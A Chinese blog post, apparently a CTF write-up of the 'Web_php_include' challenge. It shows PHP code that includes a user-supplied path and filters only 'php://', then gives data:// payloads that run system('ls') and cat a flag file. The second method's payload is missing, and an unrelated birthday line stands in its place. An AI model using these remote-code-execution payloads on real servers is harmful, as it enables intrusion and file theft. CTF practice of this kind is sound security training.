题目源码如上，简单审计一下，过滤了php:// 这是个典型的…" />

攻防世界Web_php_include

kodosan·2020-03-13·99 次阅读

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
  $page=str_replace("php://", "", $page);
}
include($page);
?>

题目源码如上，简单审计一下，过滤了php://

这是个典型的文件包含利用题目。文件名为page。

可以用两种解法。

一、利用data伪协议

data://text/plain;base64

伪协议总结:

原文地址:https://blog.csdn.net/nzjdsds/article/details/82461043

payload：?page=data://text/plain,<?php system("ls"); ?>

可以看到成功执行。说明allow_url_fopen allow_url_include是打开的。而且也读取到了敏感文件。继续读取

payload：?page=data://text/plain,<?php system("cat fl4gisisish3r3.php"); ?>

成功拿到flag。

二、利用strstr()函数的大小写敏感

payload一样:

小樱，生日快乐！

Author

kodosan

花びらは笑った

查看评论 - NOTHING

Comments | NOTHING

暂无评论

取消回复

Markdown Supported while Forbidden

你是我一生只会遇见一次的惊喜 ...

戳我呀 OωO 嘿嘿嘿ヾ(≧∇≦*)ゝ

bilibili~	(=・ω・=)	Tieba

私密评论

HI,GEEKS

攻防世界Web_php_include

小樱，生日快乐！

BUUCTF-warmup

kodosan

Comments | NOTHING

取消回复